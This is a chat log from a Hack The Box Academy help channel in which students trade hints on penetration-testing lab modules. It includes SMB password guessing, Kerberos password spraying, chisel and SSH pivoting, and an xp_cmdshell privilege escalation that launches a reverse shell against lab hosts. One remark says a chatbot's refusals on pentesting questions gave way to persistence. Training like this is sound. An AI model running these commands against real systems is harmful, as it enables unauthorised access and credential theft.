#modules
Scan what's available
nvm, i am noob. i run for smb now
that should work ¯\_(ツ)_/¯
Though I forget if SMB is set up to accept any pw
(But not auth you fully)
Netexec would be better for smb imo
is this command wrong? netexec --verbose smb 10 10.129.122.249 -u sam -p mut_password.list
because i run it but it doesn't run, so i used msfconsole
You have an extra 10 in there
forget the second 10

no no without it ;p is it correct without it?
should be ¯\_(ツ)_/¯
Iirc the syntax is nxc protocol target options
Been a minute though
┌─[parrot@parrot]─[~/Desktop/modules/passattacks/2ndcube]
└──╼ $netexec --verbose smb 10.129.122.249 -u sam -p mut_password.list
[18:40:45] INFO Socket info: host=10.129.122.249, connection.py:106
hostname=10.129.122.249, kerberos=False, ipv6=False,
link-local ipv6=False
INFO Error creating SMBv1 connection to 10.129.122.249: ('unpack smb.py:494
requires a buffer of 1 bytes', "When unpacking field
'SecurityMode | <B | b''[:1]'")
SMB 10.129.122.249 445 NIX01 [*] Windows 6.1 Build 0 (name:NIX01) (domain:) (signing:False) (SMBv1:False)
INFO Error creating SMBv1 connection to 10.129.122.249: ('unpack smb.py:494
requires a buffer of 1 bytes', "When unpacking field
'SecurityMode | <B | b''[:1]'")
SMB 10.129.122.249 445 NIX01 [-] \sam:mut_password.list STATUS_LOGON_FAILURE (The attempted logon is invalid. This is either due to a bad username or authentication information.)
i think i am doing something so wrong
nxc smb --help
still no clue, i'll let msfconsole run ;/
Nxc ran fine for me
for some reason
it wants .txt to run ..... ...
nxc smb 10.129.122.249 -u list.txt -p test.txt run
thanks for the help my friend!
¯\_(ツ)_/¯
Submit the decimal representation of the subnet mask from the following CIDR: 10.200.20.0/27
Hydra might be faster
confusing
Subnet masks are filled left to right
I've been rereading the whole thing I'm still confused on what exactly I'm supposed to do
Divide the cidr notation by 8 and use the remainder to fill the next octet. So 27 divided by 8 is 3r3
So you fill the first 3 octets, and the left 3 bits of the next (4th) octet
ah I see I think I got what you mean
Masks are always filled left --> right with bits
So you won't see a mask with 10001000
the first is 10 so it'll be 00001010 . 2^1 + 2^3
Wrong
Well that's for ip addressing
Not for subnet masking
it wants the binary representation
Of the subnet mask
of the IP

OH mb mb
Re-read the question
Ignore them
my bad
They misread the question
alright alright so I take the given cidr and divide it by 8?
Yes and use the remainder for the next octet
does tier IV module, active directory LDAP and powerview increase the chances of passing CPTS?
So if you have a 2r3 (/19) you fill the first 2 octets with bits, then fill the first (left) three bits of the next, and 0 the rest
Not really
hm
Everything you need to pass cpts is included in the course
And extra studying can actually cause you to overthink simple solutions
legit just generally, if you're having trouble and you think maybe you should know the answer, just take a step back chill out. sometimes a reset gets you in the right direction
I can't access my account at https://www.hackthebox.com/login
Https://account.hackthebox.com is the new login portal, they migrated to sso.
They retired the www.hackthebox.com portal
tf this shit so confusing
Thank you
RAAAAHHHH
What's the problem you're running into with understanding
everything I'm not gonna lie
I'm currently watching a YouTube vid
/27 is 27 bits yeah?
he said that the /? Number shows how many 1s are and the rest are 0s
yes?
So 11111111.11111111.11100000.00000000 in binary or,
255.255.224.0
Yes
Masks are left -> right
yeah
So n number of 1s followed by x 0s where x is 32 - n
You just split it into sets of 8
Because that's how ipv4 operates, in octets [sets of 8]
ye
The question is asking for the binary representation
Which is why I gave you the handy shortcut for filling in how many octets
ooooh
n/8 = xry where x is the number of octets to be filled completely and y is the number of bits in the next one
So 3r3 would be 3 filled with 3 bits for the next set
At VPN servers, what's the difference between UDP and TCP, which one is better here?
Tcp is a connection oriented protocol, so it can be more reliable
There is a question like this in the assembly module. " Download the attached file, and find the hex value in 'rax' when we reach the instruction at <_start+16>?" But there is no value called _start + 16 in the gdb gef tool. I solved the question, but what is the cause of this error?
Hi guys im stuck on AD skills assessment 1 does anyone know how to download mimikatz.exe onto the MS01 to solve the question "Find cleartext credentials for another domain user. Submit the username as your answer. " i just cant transfer any files onto MS01 for some reason please help
why the r though? And not just xy
Now the hard question, how could I know which server is better for my location
I’m living in Saudi Arabia so guess it’s eu-academy-1 or 2
I guess I was using 2 so I planning to try 1
R just stands for remainder
oh my bad
It's to separate the numbers in a way as to make them distinguished
If I say xy, then you assume multiplication of the numbers
oh alr makes sense
Hi guys. There is a question like this in the assembly module. " Download the attached file, and find the hex value in 'rax' when we reach the instruction at <_start+16>?" But there is no value called _start + 16 in the gdb gef tool. I solved the question, but what is the cause of this error?
There are many ways. Have you done the file transfer or pivoting modules?
If your file is in hex it'll be _start+A
The +n is the offset/step
wdym by pivot? im trying to download a file thats either on the webshell or on the linux
@fathom pendant I guess I didn't make myself clear.
0x401002 <_start+0002> movsxd esp, DWORD PTR [r9+0x64]
0x401006 <_start+0006> gs ins DWORD PTR es:[rdi], dx
0x401008 <_start+0008> jns 0x40102b
→ 0x40100a <_start+000a> xor rax, 0x21449
0x401010 <_start+0010>
I know that start+0010 hex value is 16, but how to fix it, I don't want it to show with this notation.
is it ok to take notes twice for the same section if I am having trouble focusing?
Sorry yea 10
If it's host to host, should be very simple through a variety of file transfer methods. smb, powershell, rdp shared drives. if it's a computer on an internal vlan the same applies except one step further by pivoting first.
The question is phrased in decimal
But yes 10 would be the right step
like I'm on the vulnerability assessment module and I did this for the first section because due to some mental health issues I'm having trouble focusing and I feel like taking notes twice helps me ingest the material better because the whole module is note taking, or at least most of it
alright after all that?
Got it, thank you. But when I solved this module 1 year ago, I got the start_16 result, or I remember it wrong. Thank you for your help ❤️
@fathom pendant
Your debugging program may have been set in decimal, not hex
So it properly worked
:]
@fathom pendant+1
hi am I asking in the wrong server?
What is your question?
skipping rn
is anyone able to help with this?
I want to know if taking notes for a section once then starting over an hour later and taking notes again is a bad idea
Nope
Rereading and revising notes helps reinforce core ideas
27 1s so n/8 = xry so 27/8=3r3 which means...?
3 full octets with 3 bits spilled over to the next
yes
What's your issue?
what do I do with that though
X is full octets, y is remaining bits
It's asking for the binary representation of /27 yeah?
On the abusing ADCS section i have followed the steps to open the mmc but there are no certificate templates to modify
Submit the decimal representation of the subnet mask from the following CIDR: 10.200.20.0/27
Oh decimal
ye
Did you add the Certificate Templates container?
if both 10?
Then it's just 2^7+2^6+2^5
? The ip has no bearing on the subnet mask
The cidr notation is all you need for the mask
oh oh ight thank you
I cheat and use calc.exe in scientific mode and type 11100000 to get it

128+64+32 btw
😭 brooo this shit is stressing
It's really not that difficult
You added the certificate templates snap-in?
I did not see anything in the module notes on how to do that. Can you point me in the right direction
Every octet you fill with 1s is 255
Look under the "Performing the Attack" section, it gives you the steps. You need to add the snap-in, choose certificate templates, then you should see them
Then you just math the one that's not full
kinda makes me doubt if i'll go through the cybersecurity master degree I was planning on doing (in about 4 years)
ye I get that
What specifically about it is stressing you brother
if i'll like yk be okay with it and learn and such yk? Can't explain it well
Thank you!
Tbh, most of the stuff you don't set yourself and is already told to you on what to input
Irl you rarely worry about subnetting unless you're doing the network setup
Cybersec is a broad field, much like pentesting is a specific field-- so is networking
This is just scratching the surface
A full deep dive into network architecture involves setting up VLANs and Switches
I just don't wanna mess up the basics which will make my progress more difficult or something
The more important takeaway is just being able to identify a network at a glance
why those and not less?
11100000
ah
Reading binary is right to left in ascending powers
2^0 would be the rightmost bit
And 2^(n-1) is the leftmost bit, where n is the number of bits
Does anybody know why nmap sometimes work at pwnbox but not vm vpn
Because nmap can be silly. Also if you're running pwnbox and the vpn on your own box at the same time, it causes issues
Well I wasn’t running them at the same time so I guess I’ll agree with you that nmap sometimes be silly
You ever get the pw?
yeah but how do I know I start using 2^7 and not 2^8?
If not I suggest hydra with ftp and 48 threads
Math
can anyone give hint on this
Module: Hacking wordpress
section: Directory Indexing
You know an octet is 8 bits
It’s just annoying when I run my own vm and then need to shift to pwnbox
PW ?
if it's any consolation I've only encountered an issue like that twice ¯\_(ツ)_/¯
Password
Put it this way, a basic math principle is that any number to the power of 0 is 1
Oh I got it and when I run to use it the pwnbox times up and I need to reset and guess what, I FORGOT TO SAVE THE PASSWORD 💔😭
So you start at 0 on the right and go up to 7 on the left, that list of numbers is 8 long
Make sure you don't have both running at the same time. They will both use the same IP, which may answer why your nmap doesn't work sometimes if you've been leaving the pwnbox on.
Sure, I only use my own vm but sometime it doesn’t work which force me to use pwnbox
Hello, good evening, does anyone know why when I try to log in it tells me that my credentials are incorrect? and they are saved.
Yes, it sounds like you have the wrong credentials saved.
Try saving the right credentials instead, hope this helps
but when I created my Google account it told me if I wanted it to save them for me hehe
What module has you make a Google account?
For ipv4, yes
yooooo
You always go down until you run out of bits
It's not always
Are you using account.hackthebox.com or hackthebox.com/login? the first one is the new login and the second is now defunct
oh
yes
So it's 2^(n-1) + 2^(n-2) + 2^(n-3)
yeah
It's a series
mhm
So if you had a remainder of 4, you continue the series
No
RAAAAHH 
Your remainder is your count basically
You will never go below the remainder in your series
Oh wait yeah it's 2^4
I didn't math 
alright alright
The remainder just fills the bits in left --> right
mhm
If it helps, write down 8 0s and under them, their relative 2^n representation, then their decimal representation
As a reference sheet
imma watch some youtube vids as well
Professor Messer is a good source
imma check him out
i see
yeah enough for today lol
too much for my lil brain
broadcast address
naaaah
The process of dividing a network into 2 or more networks is called subnetting. A subnet is a logical sub-division of an IP address.
broadcast address is always the last in the available range
which is why you can't assign a device x.x.x.255
and similarly the gateway is generally the first in a range (this number depends how it's split)
This is a neat trick if you don't know about it https://www.youtube.com/watch?v=pITq64bSbMQ
bro will not graduate dude
(havent even started uni)
I never went to college, but I feel like what you're doing is already beyond college level. I talked to a guy the other week who graduated with a 4 year cyber security degree, but he had no idea what ZAP or PortSwigger was despite saying he did CTF's
i wanna do like penetration testing
and yk thought cybersecurity would help at least
no way
really?
unless you don't know the basics of computers and networking
a cybersec degree is for basic fundamentals
usually more blue team too
yeah still gotta go through CS uni first so i still got 4years until the cybersec degree
oh oh i see
maybe there's some specialized degree beyond cybersec that i don't know about, but i haven't ever heard of a pentesting course being taught by a college
yeah no there isnt such thing if im not wrong
its only like cybersec
i think thats the closest thing you can get
neat
i was about to start studying, noticed my vpn isnt connecting and i went to download a new vpn file.. where is the vpn file download now!? lol am i going crazy? but i dont see it
in sections that require it there's a download on the page otherwise:
im on this and there should be a vpn to see the target
It's using a public_ip:port
So not necessary
Log in to WordPress with the credentials for the john user,
is given john creds just example ? or something else
hi guys, I'm doing the WP skill assessment. Can someone explain to me based on what the website name resolves? I'll give an example. When I tried to fuzz the VHost name and I added the site with the ending of ".htb" to my /etc/hosts file, it didn't resolve, but when I changed the /etc/hosts file to ".local" it resolved and I don't understand why.
we would need to see what you added to your hosts file and what command you used to resolve the host, if those two things are correct it will resolve
hi all I have a problem in the footprinting medium lab, I run microsoft sql server management as administrator (through rdp), but when I want to enter the password i cannot do "@" and it's in the password, so i'm stuck, any idea?
what command are you using that includes the password with @
if it's for rdp, you probably just need to surround your password with quotes
in general; the lab environment is gonna be under one of two tlds - .local or .htb. Sometimes if there's a forced redirect you can figure out what the domain is
If the site uses a cert, you can check that for the FQDN, but that is not so common in the labs.
it's actually fairly common
maybe not a TLS cert
no i'm already in the rdp, i am in a windows session, but through this windows session i must run sql as admin. A new window opens where i need to enter a password but in this window i cannot paste the password with right click paste or with ctrl v. and i cannot make a @ with alt gr and 0. but the password contains a @
but usually a script scan can reveal a bunch
it's likely using a US-qwerty-keyboard layout
OK. I completed all the labs, I didn't find it too common, but this is an opinion and we can each have our own.
(also you can use those creds to login as the ||adm||)
maybe in the bug bounty path?
¯\_(ツ)_/¯
ahh, good point.
but it's fairly common in the pentest path
if you're doing rdp and such and doing /cert:ignore you don't see the cert pop up at all
so how do you do @ in qwerty ?
Not sure, I don't have any issues simply typing "@" when remoted in.
shift + 2
different kb layout
You could try accessibility options and opening the windows built-in on-screen keyboard to type the character most likely.
¯\_(ツ)_/¯
lol what keyboard layout doesn't have the @ though.. you need it to email all the time

it has it, just as a different key combo
different layout doesn't mean that symbols stop existing
I'm usually switching around 3 layouts. And it's a pain once you forget all the combos for | ' @ etc
just means they're in alternate places
then just type it 😛
I think xfreerdp has a way to pass through the kb layout or you can go to settings whenever you rdp in and manually change it
hm i don't think it's a qwerty problem, it's strange cause anywhere else in the rdp session i can type @ but just in this window of run as administrator i cannot anymore, that's really strange. i think i will make a post on the forum with a screen. thx for your help
Can you type it in notepad (or whatever) and then copy/paste?
Try the OSK
no i cannot copy paste at all in this window, i tried already, i can just type letters and numbers, the rest feels unresponsive. the parrot terminal says: unknow key with x keycode 0xfd
what happens with the osk?
i 'm gonna try ...
it works !!!! thank you very much.
and sorry for my bad english it is not my native language
you did fine, didn't even know
can't solve broken authentication module predictable reset token plz help
What did you try?
I'm trying to create a script in order to generate a valid reset token but it doesn't work properly and i don't know why yet
you have to use the time displayed on the website after you have generated the token.
Use milliseconds
gonna take a nap because i don't wanna download/configure ZAP for the intruder section of the Web Proxies module 
Hey can I dm you?
sure
Hey guys, I am stuck on the last question of the skill assessment for the NTLM relay attacks module, is there anyone I can DM for a hint ?
can you ask and phrase your question here without spoiling the content i.e. using shorthands like <firstInitial>* for usernames and <firstCharacter>* for passwords, etc.
@fathom pendant I checked back the knowledge check exercise in the getting started module, I was able to inject the payload into one of the theme's source code and when I reloaded some link that links to the target, I got a "CSRF detected" but didn't get a shell back on my netcat listener and now Idk the link I visited to get a shell back, please help
¯\_(ツ)_/¯
I don't want to cheat by going to youtube, I want to be able to do this myself
most people, including myself, used msf to do it
you'll learn more techniques as you move forward
Thought you said using msf wouldn't work🤨
i suggest not getting hung up on it
i didn't; i said just throwing random shit with msf won't work
you now have an idea of the plugin and vulnerability
Yeah I'll see if I can get it this time, thanks for the help
👍 it's not shameful to look up guides for tier 0 content - sometimes it's overwhelming, especially when Getting Started is a mix of a bunch of surface level stuff
8
2024/05/07 18:47:38 > [+] VALID USERNAME: jjones@inlanefreight.local
2024/05/07 18:47:38 > [+] VALID USERNAME: sbrown@inlanefreight.local
2024/05/07 18:47:38 > [+] VALID USERNAME: tjohnson@inlanefreight.local
2024/05/07 18:47:38 > [+] VALID USERNAME: jwilson@inlanefreight.lo
when password spraying with kerbrute that is active domain username should i do jjones or jjones@inlanefreight.local?
generally domain users are the username@domain but sometimes it's the whole thing
the samAccountName though is the first bit ¯\_(ツ)_/¯
i c
i even used pw for one of the accs and it still didn't show up as a success
like there should've been one hit since i used a pw from a user in that list
put the users in a file
also don't fucking print the giant list
soz
a password from one of the users
but it got 0 hit then also Welcome1 Password123
but 0 hit...
Welcome1 should work for one of the users in your list
also again you can just delete the list you pasted here
as it may contain spoilers, alongside your comment
this shid just dont make sense///
the password Welcome1 may work
i tried it but no work..
this Q right?
KK021
SM297
ZT938
UK023
like this is my users list
yes
└──╼ $kerbrute passwordspray -d inlanefreight.local --dc DCIP users Welcome1
i used crackmapexec with domain acc to get users
2024/05/07 19:29:35 > Using KDC(s):
2024/05/07 19:29:35 > DC IP:88
try signing onto one of the windows hosts and import DomainPasswordSpray --> use that ¯\_(ツ)_/¯
i c make sense danke
also weird that it's saying DC IP :88
if you do --verbose or whatever the flag is, it should show you what it's doing
i have a feeling it's not reading the users file or it's doing something funky
Try using the DNS name and not the IP
ip should work
ya it should. 🤷♂️
¯\_(ツ)_/¯
something is slightly off
i suggest also naming the userfile users.txt or users.list
¯\_(ツ)_/¯
also when in doubt use ./ to tell it to use cwd for the file ./users.txt
┌─[htb-student@skills-par01]─[~]
└──╼ $./chisel client 10.10.15.127:9999 R:socks
2024/05/07 19:52:52 client: Connecting to ws://10.10.15.127:9999
2024/05/07 19:52:53 client: Connected (Latency 79.153822ms)
why won't this work
┌──(sam㉿kali)-[~/chisel]
└─$ ./chisel server --port 9999 --reverse
2024/05/07 16:51:10 server: Reverse tunnelling enabled
2024/05/07 16:51:10 server: Fingerprint g3LIdXHgewAUTP4DXt3pdT5CJS/DRh4gFGonf3LSpKM=
2024/05/07 16:51:10 server: Listening on http://0.0.0.0:9999
2024/05/07 16:52:00 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
└─$ proxychains ping 172.16.7.3
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
PING 172.16.7.3 (172.16.7.3) 56(84) bytes of data.
socks5 127.0.0.1 1080
i'd just run the commands with the tools on the par01 host
i c makes sense
you can pivot, but no need considering you have a stable host to use ¯\_(ツ)_/¯
and yes, you can rdp to that host
just dynamic ssh, so much easier
if you want to use chisel, you generally need to use an old version because the parrotboxes don't have the libraries for the newer versions, i believe 1.7.3 or below is fine
i c makes sense danke
also, if you're using chisel, make sure it's setup for socks5 in your proxychains.conf
but yeah a lot easier to just dynamic port forward, it's sshing in with one extra parameter, vs sshing in and setting up chisel
Pretty much more managed tunneling
seems pretty similar, if not exactly the same as wireguard. it even uses wireguard's drivers
a tun... i see what you did there
bruh └─$ ssh -D 9090 htb-student@10.129.39.248
└─$ sudo proxychains xfreerdp /v:172.16.7.3 /u:AB920
┌─[htb-student@skills-par01]─[~]
└──╼ $channel 3: open failed: connect failed: Connection refused
channel 3: open failed: connect failed: Connection refused
channel 3: open failed: connect failed: Connection refused
defaults set to "tor"
socks5 127.0.0.1 9090
if i xfreerdp from the attack host its just really laggy
its too slow..

you would be sshing into the parrotbox, the one you're logged into htb-student with
i think he's (poorly) showing that after doing the dynamic forward, it's still not showing
but also idk if rdp is available on the A* host
looks like the pivot is working, but it's the box that's refusing it then
it might be and i'm misremembering
still not sure though, not enough details for us to know
yeah the DC doesn't have rdp enabled
they're trying to RDP to DC with a different machine's user
Hey guys for the module introduction to windows command line i'm stuck at a question of content "Finding files and directories". I have to find the flag that is in the waldo.txt file but i can't find it, i tried a lot of things but nothing worked. Here's the question. Any advice?
trees or where will help you
as i stated in your community help post
tree /? and where /? will give you the command arguments that they accept
or you can look at the cheat sheet for a reference of commands and syntaxes
@fathom pendant i already did just not the tree i will look tomorrow
when in doubt ask chatgpt for the command
nothing with tree
i can assure you it can be found with tree
again if you use /? with a command it gives you all the available options and flags for it
the tree command is OP tbh
where are you using it from
if you're using it from your current home directory you won't find anything
maybe branch out from Users
I'm sure this has been linked 1000x but I think a module question is wrong. It's a small thing but where can I provide feedback?
every time i thought that i was wrong
PS C:\Users\htb-student> tree /F
but it show everything also in c:\
go one step back
branch out from Users
Well... this is a very simple thing and there are only 3 cases to check. If anyone has done the command injection module I could run it by them to verify before I submit anything
sure
ohhhhhhhhhh
yupiee
but why?
Why did i not see it from the C:\Users\htb-student>
because by default; tools only assume their start is from the current working directory
so it doesn't look backwards
like if you do dir it doesn't show you the dir listing of the previous folder
it shows you the current folder
but if you specify dir C:\users\ it lists the C:\users directory
it doesn't know you want to look beyond it
or in this case go one step back and look at it all
If you're looking for the file itself you could use these in a powershell session
Get-ChildItem -Path C:\<add the rest> -name <the file name> -Recurse -Force
Once you find the file use Get-Content to output it by using this
Get-Content -Path <enter file path>
that works too
or in CMD the where command
my best guess is they didn't specify the starting point early enough, and so they were stuck at C:/users/htb-student wondering why it didn't look at the whole computer
mmmm that looks to be it really
yeah but i found an alternative by using where from the root
thanks for your help
that also works
as long as you're before the parent directory that hosts the file, it will find it
directory hierarchy we must remember
Working on the web skills assessment and I'm at the point to reset the admin password, I've found a technique that will allow me to do this but it complains about missing parameters. Looking at the source code, it appears I have all parameters in my request. Any nudges?
Thank you very much @cloud urchin
It turns out the module was right and I am a confirmed dum dum
any advice for config file on AD Enumeration & Attacks - Skills Assessment Part II? i checked the files on ||C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config|| can't find
- 1 Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?
https://academy.hackthebox.com/achievement/667914/110 :D neat showcase of some proxy tools
That "change request method" feature is nifty
nvm i find
XXE is definitely something I need to practice
Im big chilling on the ffuf module
it's a nice diverse tool
I'm using the guide as a sort of "ok I got it, but how did they want me to get it now" and it's like "oh, the same way, nice"
bop
ffuf is actually so useful
SQL> EXEC xp_cmdshell '"C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\PrintSpoofer64.exe" -c "C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\reverse_shell.exe"'
why won't this work
05/07/2024 11:35 PM 27,136 PrintSpoofer64.exe
05/07/2024 11:41 PM 7,168 reverse_shell.exe
SQL> EXEC xp_cmdshell '"C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\PrintSpoofer64.exe" -c "C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\reverse_shell.exe"'
output
The filename, directory name, or volume label syntax is incorrect.
NULL
damn i got it to work dis shid is long..
doesn't look like it's working to me
unless you figured out your mistake
damn so far the bruteforce module is EZ
WPScan was able to find valid credentials for one user, john:firebird1.
when i try those cred it giving errors wrong creds
solved
i like that module
i've completed that and am almost done with the bruteforcing module
i want to see this same energy on AEN
yeah it's easy sailing from there
like in the past i wanna say 6 hours i've completed the web module from then to this one
working my way through the services assessment now
so if a person is doing a web app job do they need that AD knowledge or can they work without it
hmmm, so getting job in app sec can be easier for fresher?
it just depends

app sec is still a tough job ¯\_(ツ)_/¯
you gotta know code reviewing and stuff like that
and you have to be relatively well versed in the lang you're testing
you might run into internal web apps running inside private networks for a company, but i imagine the only way you'd get there is through a regular good o' pentest. so the web skills can still aid a pentester, but if you're focusing specifically on external websites then yeah i agree ad probably isn't going to be involved much beyond maybe authentication type things.
indirectly becoming web dev by learning app sec lol
and even that's a stretch, AD oauth generally isn't gonna be used for outside stuff except maybe 2FA and SaaS solutions
eh moreso on the internal web app
i worked for a fortune 500 that had some really shitty insecure java website internally
and snmp (:
internally; OAUTH go brrr :)
free packets for days
granted in a TLS wrapped environment they mean nearly nothing
i was more talking to jojo about the question 'if a person does web app job do they need that ad knowledge'
just saying it may aid if you're pentesting like normally to know web, but not so much the other way
can definitely still happen though
these sysadmins are stressed
so i have completed 90% cpts and have cube to buy 1 module , which modules should i do after cpts
no specific question just asking for opinion on recommended modules to try
whatever you want to my guy
do a module that interests you
there's plenty of higher tier AD modules (that are completely unnecessary for CPTS) if you wanna dive more into AD
my vote goes to adcs
i forgot to tick a box in cupp 
and just like that
gonna get some sleep before tackling SQLi
But speaking of brute forcing, everything was easy since I kinda just... read it
overall, is using AI to remember some command syntax wrong, if overall i know what i am doing?
I would suggest fucking with a command or copy/pasting it into a note-taking app
It'll help you understand it more
It's all fun and games until you lock out systems or mess things up in some other way. Just because you don't want to take good notes? Note taking is a part of learning.
AI is good and a lot of times it can help your syntax but it also makes stuff up and is just flat out wrong sometimes. You don't want to rely on it and instead be diligent in note taking.
I often can just do <command> --help or man <command> and find the syntax mistake faster
yeah i will start taking notes fr
AI can be a valuable tool. But it shouldn't replace your brain and regular notes
I use ai a lot for grunt work. I lost a day recently cause I asked it to change a script. It "corrected" something that it thought was a mistake and I never checked it. 
yeah it's pretty awesome for stuff like that
That's the first time its screwed me over since using paid Chat GPT 4
In fairness it was a weird thing only a human could notice perhaps
yeah and then you can correct it and it'll be like "oh yeah sorry you're right"
But still I got used to it being right

I work with a lot of student code so its amazing for reading and fixing their code
Up to a point
yeah it's fixed my syntax many times, but then also i've seen it completely make up parameters that don't even exist for the app
Yeah for sure
And the free one is awful for that
The paid one is pretty sick
Especially that I can screen shot and drop that in
I was setting up an AD network to play with yesterday and its so handy to have an expert there to ask
But yeah you kinda have to know what the answer should be anyway and just use it as a time saver or it can drop you in wonderland
yeah you need to know how to frame your questions properly so you need to have an understanding, at least enough of an understanding to know exactly what to ask for
in the past i noticed chatgpt refused to answer a lot of pentesting questions without more persistence, but lately it seems it gave up and just answers questions without bothering anymore.
try a traceroute
I wondered about this
Did someone manually review or something
Mine was the same and occasionally out of the blue it starts saying it can't help with that. Not to be relied on
the command is "traceroute"
yeah it opened help
it should tell you there what to do. traceroute <ip>
that should show you where your connection is failing
i did ifconfig and i dont know which one to use
tun0 on VPN
what module are you on?
alright well connection issues are generally going to boil down to only a few reasons. 1) you're not connected to the vpn, or on the wrong vpn. 2) you didn't spawn the victim host or are inputting the wrong ip address for the victim host. 3) you also have the pwnbox spawned while on the vpn which will cause conflicts because they share the same ip. 4) the box actually died in which case you may just need to restart it.
- im
2)no typo, i tried same ip in pwnbox(after failing to use it with vpn) it was working [i dont know but target took long to spawn]
3)no
4)(2)
well, go back to traceroute and see where the connection is failing
i would still wager it's one of the other things i mentioned
what message it shows after you connect to vpn
it didnt fail so
you can type "ip a" and see if you have a tun0 (for kali)
ip a will work but the adapter may be named different idk i don't use parrot
ens something?
read the error it will likely tell you what's wrong
no error
traceroute ip(tun0)
no, you need to traceroute to the victim
i still think it's one of the things i said, i really don't believe you did it all correctly because that will solve 99.99999% of people's issues here
what are the ways to check what i did wrong
if you're connected to the vpn and ensure you're using the correct target IP address, the correct nmap syntax, and don't have the pwnbox spawned you should have no issues reaching the victim box.
you could also just use the pwnbox instead of your own machine
it's laggy and limited time so
i never had this problem before
then you can just respawn it again
oh nm idk if the pwnbox even despawns at all
i was thinking of the victim box
the ip didnt change when i did ifconfig
with and without vpn
nmap -sV target
show a screenshot of your adapter connected to the vpn, show a screenshot of your nmap command
adapter?
yeah your vpn connection
where to
ip a
it looks the same as ifconfig
show the whole thing
tun0 right?
EU TCP
also still waiting on that traceroute
but it showing ip is it safe?
i'll need to see all of the stuff not just some and not cut off pics
you can black out your public ip
i don't need that
Did someone here finish the Trust module skills assessment? i have a question, if i may dm?
also show a screenshot of the victim ip you spawned
bruh i got stuck on the trust attacks because the creds they provide don't work how the hell did you get past that
can i dm you
why
the ss only
ok
AD Trust attacks, these creds simply do not work. What am I doing wrong here?
login failure due to bad credentials via xfreerdp and remmina
Try Test@1234 as password
ok, same result
The description is wrong
dang. glad i asked
The HTB_ ... password is meant for internal machines
legend thank you
I also had a gigantic WTF moment
is that a box? this channel is for modules from academy
oop mb
:((
Hello, I am working on the module "File transfer", section "Windows File Transfer Methods", and I am at the paragraph "Connecting to the Webdav Share".
I have followed the previous steps to set up a WebDAV server on my Linux machine:
$sudo ./python3_venv/bin/wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
However, I cannot access this server from my target machine as shown in the module:
PS C:\Users\htb-student> dir \\10.10.15.145\DavWWWRoot
dir : Cannot find path '\\10.10.15.145\DavWWWRoot' because it does not exist.
At line:1 char:1
+ dir \\10.10.15.145\DavWWWRoot
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (\\10.10.15.145\DavWWWRoot:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
The thing is I can access it using wget:
PS C:\Users\htb-student> wget http://10.10.15.145/tutu/file.txt -OutFile tutu.txt
PS C:\Users\htb-student> type tutu.txt
tutu
I also tried to directly specify the folder tutu:
PS C:\Users\htb-student> dir \\10.10.15.145\tutu
dir : Cannot find path '\\10.10.15.145\tutu' because it does not exist.
At line:1 char:1
+ dir \\10.10.15.145\tutu
+ ~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (\\10.10.15.145\tutu:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
Why can't I access my WebDAV share using a UNC path?
Thanks.
Have you tried this outside of a venv?
Does the folder 'DavWWWRoot' exist where you have spawned the 'Webdav Share'?
The folder "DavWWWRoot" does not have to exist. As said in the module:
DavWWWRoot is a special keyword recognized by the Windows Shell. No such folder exists on your WebDAV server. The DavWWWRoot keyword tells the Mini-Redirector driver, which handles WebDAV requests that you are connecting to the root of the WebDAV server.
But, in case of doubt, I created a folder tutu and tried to access it. It works using wget but not using a UNC path.
I will give it a try.
I didn't have any issues outside of a virtual env so give that a shot
It does not work either. On Linux:
$sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
Running without configuration file.
11:21:10.855 - WARNING : App wsgidav.mw.cors.Cors(None).is_disabled() returned True: skipping.
11:21:10.857 - INFO : WsgiDAV/4.2.0 Python/3.11.2 Linux-6.5.0-13parrot1-amd64-x86_64-with-glibc2.36
11:21:10.857 - INFO : Lock manager: LockManager(LockStorageDict)
11:21:10.857 - INFO : Property manager: None
11:21:10.857 - INFO : Domain controller: SimpleDomainController()
11:21:10.857 - INFO : Registered DAV providers by route:
11:21:10.857 - INFO : - '/:dir_browser': FilesystemProvider for path '/usr/lib/python3/dist-packages/wsgidav/dir_browser/htdocs' (Read-Only) (anonymous)
11:21:10.857 - INFO : - '/': FilesystemProvider for path '/tmp' (Read-Write) (anonymous)
11:21:10.857 - WARNING : Basic authentication is enabled: It is highly recommended to enable SSL.
11:21:10.857 - WARNING : Share '/' will allow anonymous write access.
11:21:10.857 - WARNING : Share '/:dir_browser' will allow anonymous read access.
11:21:10.892 - INFO : Running WsgiDAV/4.2.0 Cheroot/9.0.0 Python 3.11.2
11:21:10.892 - INFO : Serving on http://0.0.0.0:80 ...
On Windows:
PS C:\Users\htb-student> dir \\10.10.15.145\tutu
dir : Cannot find path '\\10.10.15.145\tutu' because it does not exist.
[...]
PS C:\Users\htb-student> dir \\10.10.15.145\DavWWWRoot
dir : Cannot find path '\\10.10.15.145\DavWWWRoot' because it does not exist.
[...]
PS C:\Users\htb-student> wget http://10.10.15.145/tutu/file.txt -OutFile tutu.txt
PS C:\Users\htb-student> type tutu.txt
tutu
And here are the logs on Linux server:
11:23:39.454 - INFO : 10.129.249.156 - (anonymous) - [2024-05-08 09:23:39] "GET /tutu/file.txt" depth=0, elap=0.002sec -> 200 OK
Is it possible that there is a firewall on the Windows machine? I would be surprised because I suppose the traffic goes through port 80 in both cases.
Don't think so
Creating a folder DavWWWRoot does not change anything:
PS C:\Users\htb-student> dir \\10.10.15.145\DavWWWRoot
dir : Cannot find path '\\10.10.15.145\DavWWWRoot' because it does not exist.
